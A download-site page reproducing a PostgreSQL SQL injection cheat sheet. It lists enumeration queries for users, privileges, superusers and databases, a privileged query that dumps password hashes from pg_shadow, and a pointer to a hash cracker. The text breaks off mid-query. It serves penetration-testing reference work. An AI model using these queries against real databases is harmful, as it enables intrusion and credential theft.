Postgres数据库SQL注入手册1
需积分: 0 55 浏览量
2022-08-08
18:18:38
上传
评论
收藏 20KB DOCX 举报
Postgres SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “– priv”
at the end of the query.
Version
SELECT version()
Comments
SELECT 1; –comment
SELECT /*comment*/1;
Current User
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List Users
SELECT usename FROM pg_user
List Password
Hashes
SELECT usename, passwd FROM pg_shadow — priv
Password
Cracker
MDCrack can crack PostgreSQL’s MD5-based passwords.
List Privileges
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA
Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current
Database
SELECT current_database()
List
Databases
SELECT datname FROM pg_database
List Columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type
T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND
评论0